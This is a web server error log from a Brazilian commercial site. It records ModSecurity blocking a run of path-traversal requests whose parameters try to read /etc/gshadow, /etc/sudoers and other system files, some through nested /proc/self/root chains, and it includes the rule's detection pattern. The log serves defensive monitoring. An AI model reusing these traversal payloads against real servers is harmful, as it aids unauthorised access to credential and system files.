[Fri Mar 20 12:46:27.078676 2026] [:error] [pid 26799:tid 140411590858496] [client 216.73.216.191:42062] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1r09a6ubjKNq_cu4Yb7AAAA1I"]
[Fri Mar 20 12:46:29.329333 2026] [:error] [pid 9818:tid 140411624429312] [client 57.141.18.8:42148] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1r1F1pVZ5mVmJwsFNsWAAAAE4"]
[Fri Mar 20 12:46:33.663504 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:42404] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1r2fqxLDW4GITHUkQqKQAAAQY"]
[Fri Mar 20 12:46:38.791323 2026] [:error] [pid 7235:tid 140411565680384] [client 216.73.216.191:42756] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1r3vqxLDW4GITHUkQqMAAAARU"]
[Fri Mar 20 12:46:43.747334 2026] [:error] [pid 26799:tid 140411565680384] [client 216.73.216.191:43110] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1r49a6ubjKNq_cu4YcCAAAA1U"]
[Fri Mar 20 12:46:49.232897 2026] [:error] [pid 10189:tid 140411599251200] [client 216.73.216.191:43524] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1r6TJ3M9BSuKP7CAZpugAAAJE"]
[Fri Mar 20 12:46:50.066520 2026] [:error] [pid 26799:tid 140411616036608] [client 216.73.216.191:43576] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1r6ta6ubjKNq_cu4YcDwAAA08"]
[Fri Mar 20 12:46:50.843232 2026] [:error] [pid 21219:tid 140411540502272] [client 216.73.216.191:43638] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1r6vXLqtnMIWvjpaLb2AAAApg"]
[Fri Mar 20 12:47:00.573063 2026] [:error] [pid 9818:tid 140411641214720] [client 216.73.216.191:44288] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1r9F1pVZ5mVmJwsFNsfQAAAEw"]
[Fri Mar 20 12:47:14.594762 2026] [:error] [pid 15826:tid 140411632822016] [client 216.73.216.191:44988] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1sAuoXxyEfFpUF8f--BgAAAU0"]
[Fri Mar 20 12:47:19.267228 2026] [:error] [pid 11167:tid 140411565680384] [client 216.73.216.191:45218] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1sBvHIg5MgXLBnicMyhQAAAdU"]
[Fri Mar 20 12:47:21.588463 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:45422] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1sCRCii7xarUs8iHap8wAAAg8"]
[Fri Mar 20 12:47:22.900744 2026] [:error] [pid 31215:tid 140411607643904] [client 216.73.216.191:45528] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1sCgF0L0L-SsrnPo6mLQAAAtA"]
[Fri Mar 20 12:47:28.055041 2026] [:error] [pid 11167:tid 140411691570944] [client 216.73.216.191:45884] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1sEPHIg5MgXLBnicMykQAAAcY"]
[Fri Mar 20 12:47:34.345109 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.104:46382] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1sFuoXxyEfFpUF8f--IAAAAUo"]
[Fri Mar 20 12:48:01.638298 2026] [mime_magic:error] [pid 7893:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:48336] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:48:02.713965 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 57.141.18.67:48396] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:48:15.868091 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:47928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1sP_qxLDW4GITHUkQquwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:48:16.761024 2026] [mime_magic:error] [pid 10189:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:49286] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:48:19.952279 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:41524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1sQ9a6ubjKNq_cu4YcmAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:48:40.202346 2026] [mime_magic:error] [pid 7235:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:50746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:48:51.309554 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:43454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1sY_XLqtnMIWvjpaLccgAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:48:56.066359 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:41548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1saPqxLDW4GITHUkQq6AAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc